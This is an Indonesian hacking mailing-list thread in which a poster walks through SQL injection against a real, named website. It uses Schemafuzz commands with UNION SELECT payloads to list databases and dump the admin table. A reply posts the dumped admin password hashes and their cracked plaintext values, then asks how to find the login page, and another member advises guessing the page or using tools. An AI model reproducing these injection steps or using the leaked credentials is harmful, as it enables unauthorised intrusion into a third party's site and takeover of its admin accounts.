Langsung menuju TKP saja deh, dari pada kelamaan.
Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari sendiri,
bagai mana menggunakannya bisa dibaca di banyak posting baik forum
maupun blog.
Bahan-bahan yang dibutuhkan;
1. Python
2. Schemafuzz
3. Koneksi Internet
4. Target Operasi.
-------------------------------------------------------
Langkah pertama tentu saja dengan membuka halaman search engine (my
fav is google)
disana kita mencari target dengan mengetikan kerword bebas sesuai
dengan feeling.
Kebetulan saya menemukan target bagus yaitu http://dibekasi.net/banner_klik.php?id_bnr=37' karena ditambahkan tanda ( ' ) sehingga muncul You have an error in
your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'' at line 1. Itu
adalah salah satu cara mengetahui apakah web ada vurln atau tidak.
Sebenarnya masih ada beberapa cara lain, silahkan ber eksplorasi.
Langkah kedua langsung menggunakan alat yaitu schemafuzz:
1. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31" --
findcol
untuk mengetahui column (angka ajaib yang digunakan untuk proses
injeksi)
maka akan muncul
http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,...,
26
itu digunakan untuk injeksi selanjutnya.
2. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND +1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --dbs untuk mengetahui semua database yang dipunyai oleh user
tersebut.
3. Untuk melihat table dan fieldnya semua di semua database
perintahnya:
Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND +1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --full
nanti akan muncul table beserta field-fieldnya, seperti:
--cut--
[60]useradmin:
id_user,nama,username,password,level,user,del,welcome,logout
--cut--
4. Untuk melihat isi tablenya:
schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND +1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" --dump
-D "adztrel_dibekasinet" -T "useradmin" -C "username,password"
Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9:
Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.
--------------------------------------------------------------------------- -----------------------------
Buat yang tahu duluan/lebih mahir mohon maaf bukannya bermaksud
menggurui tapi cuma mau share.
Buat yang ingin lebih tahu silahkan berdiskusi disini.
--------------------------------------------------------------------------- -----------------------------
NB :
Saya masih nyubi.
> From: WoNX <wonxc...@gmail.com> > Subject: [jogjahacking] Sedikit Penggunaan Tools untuk SQL Inject > To: "jogjahacking" <jogjahacking@googlegroups.com> > Date: Sunday, April 12, 2009, 2:19 AM > Langsung menuju TKP saja deh, dari pada kelamaan. > Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari > sendiri, > bagai mana menggunakannya bisa dibaca di banyak posting > baik forum > maupun blog. > Bahan-bahan yang dibutuhkan; > 1. Python > 2. Schemafuzz > 3. Koneksi Internet > 4. Target Operasi. > ------------------------------------------------------- > Langkah pertama tentu saja dengan membuka halaman search > engine (my > fav is google) > disana kita mencari target dengan mengetikan kerword bebas > sesuai > dengan feeling. > Kebetulan saya menemukan target bagus yaitu > http://dibekasi.net/banner_klik.php?id_bnr=37' > karena ditambahkan tanda ( ' ) sehingga muncul You have > an error in > your SQL syntax; check the manual that corresponds to your > MySQL > server version for the right syntax to use near > '\'' at line 1. Itu > adalah salah satu cara mengetahui apakah web ada vurln atau > tidak. > Sebenarnya masih ada beberapa cara lain, silahkan ber > eksplorasi.
> Langkah kedua langsung menggunakan alat yaitu schemafuzz: > 1. Schemafuzz.py -u > "http://dibekasi.net/banner_klik.php?id_bnr=31" -- > findcol > untuk mengetahui column (angka ajaib yang digunakan > untuk proses > injeksi) > maka akan muncul > http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,..., > 26 > itu digunakan untuk injeksi selanjutnya. > 2. Schemafuzz.py -u > "http://dibekasi.net/banner_klik.php?id_bnr=31+AND > +1=2+UNION+SELECT+0,1,2,darkc0de, > 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, > 26" --dbs untuk mengetahui semua database yang > dipunyai oleh user > tersebut. > 3. Untuk melihat table dan fieldnya semua di semua database > perintahnya: > Schemafuzz.py -u > "http://dibekasi.net/banner_klik.php?id_bnr=31+AND > +1=2+UNION+SELECT+0,1,2,darkc0de, > 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, > 26" --full > nanti akan muncul table beserta field-fieldnya, seperti: > --cut-- > [60]useradmin: > id_user,nama,username,password,level,user,del,welcome,logout > --cut-- > 4. Untuk melihat isi tablenya: > schemafuzz.py -u > "http://dibekasi.net/banner_klik.php?id_bnr=31+AND > +1=2+UNION+SELECT+0,1,2,darkc0de, > 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" > --dump > -D "adztrel_dibekasinet" -T "useradmin" > -C "username,password" > Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9: > Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.
//Asalamu'alaikum
saya sudah mendapatkan user dan pass pada tabel "useradmin"
hasilnya :
[0] 1:sa:3bea988934f111279159c7fbfd82ddf9:Super Admin: [1] 44:jkab5z3n:f97530aaffcfc9045b28ea891e65d08b:Super Admin: [2] No data
setelah saya crack pass menjadi (515190744)dan (ex1hc12c)
Nah yang saya bingung ni pasword utuk Cpanel atau hanya Super Admin di web?
seandainya itu hanya Super Admin di web terus alamat loginnya dimana ya ?
hehe...
tolong kasih pencerahanya ya... !!
maklum saya masik orang awam klw masalah ky ginian.....
Itu adalah user dan pasword dari admin website tsb.
untuk mencari halaman login administratornya bisa dengan coba-coba
sendiri atau dengan tools.
mengenai toolsnya saya belum menemukan yang bener2 cocok.
kalau ada yang punya bisa share.
> Itu adalah user dan pasword dari admin website tsb.
> untuk mencari halaman login administratornya bisa dengan coba-coba
> sendiri atau dengan tools.
> mengenai toolsnya saya belum menemukan yang bener2 cocok.
> kalau ada yang punya bisa share.
> Thank's atas responnya.
> NB: Ibnusina ini dari #hitamputih@DalNet ya?
> > //Asalamu'alaikum
> > saya sudah mendapatkan user dan pass pada tabel "useradmin"
> > hasilnya :
> > [0] 1:sa:3bea988934f111279159c7fbfd82ddf9:Super Admin:
> > [1] 44:jkab5z3n:f97530aaffcfc9045b28ea891e65d08b:Super Admin:
> > [2] No data
> > setelah saya crack pass menjadi (515190744)dan (ex1hc12c)
> > Nah yang saya bingung ni pasword utuk Cpanel atau hanya Super Admin di
> web?
> > seandainya itu hanya Super Admin di web terus alamat loginnya dimana ya ?
> > hehe...
> > tolong kasih pencerahanya ya... !!
> > maklum saya masik orang awam klw masalah ky ginian.....
> Langsung menuju TKP saja deh, dari pada kelamaan.
> Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari sendiri,
> bagai mana menggunakannya bisa dibaca di banyak posting baik forum
> maupun blog.
> Bahan-bahan yang dibutuhkan;
> 1. Python
> 2. Schemafuzz
> 3. Koneksi Internet
> 4. Target Operasi.
> -------------------------------------------------------
> Langkah pertama tentu saja dengan membuka halaman search engine (my
> fav is google)
> disana kita mencari target dengan mengetikan kerword bebas sesuai
> dengan feeling.
> Kebetulan saya menemukan target bagus yaitu
> http://dibekasi.net/banner_klik.php?id_bnr=37' > karena ditambahkan tanda ( ' ) sehingga muncul You have an error in
> your SQL syntax; check the manual that corresponds to your MySQL
> server version for the right syntax to use near '\'' at line 1. Itu
> adalah salah satu cara mengetahui apakah web ada vurln atau tidak.
> Sebenarnya masih ada beberapa cara lain, silahkan ber eksplorasi.
> Langkah kedua langsung menggunakan alat yaitu schemafuzz:
> 1. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31" --
> findcol
> untuk mengetahui column (angka ajaib yang digunakan untuk proses
> injeksi)
> maka akan muncul
> http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,...,
> 26
> itu digunakan untuk injeksi selanjutnya.
> 2. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND > +1=2+UNION+SELECT+0,1,2,darkc0de,
> 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
> 26" --dbs untuk mengetahui semua database yang dipunyai oleh user
> tersebut.
> 3. Untuk melihat table dan fieldnya semua di semua database
> perintahnya:
> Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND > +1=2+UNION+SELECT+0,1,2,darkc0de,
> 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
> 26" --full
> nanti akan muncul table beserta field-fieldnya, seperti:
> --cut--
> [60]useradmin:
> id_user,nama,username,password,level,user,del,welcome,logout
> --cut--
> 4. Untuk melihat isi tablenya:
> schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND > +1=2+UNION+SELECT+0,1,2,darkc0de,
> 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" --dump
> -D "adztrel_dibekasinet" -T "useradmin" -C "username,password"
> Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9:
> Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.
> --------------------------------------------------------------------------- -----------------------------
> Buat yang tahu duluan/lebih mahir mohon maaf bukannya bermaksud
> menggurui tapi cuma mau share.
> Buat yang ingin lebih tahu silahkan berdiskusi disini.
> --------------------------------------------------------------------------- -----------------------------
> NB :
> Saya masih nyubi.
|
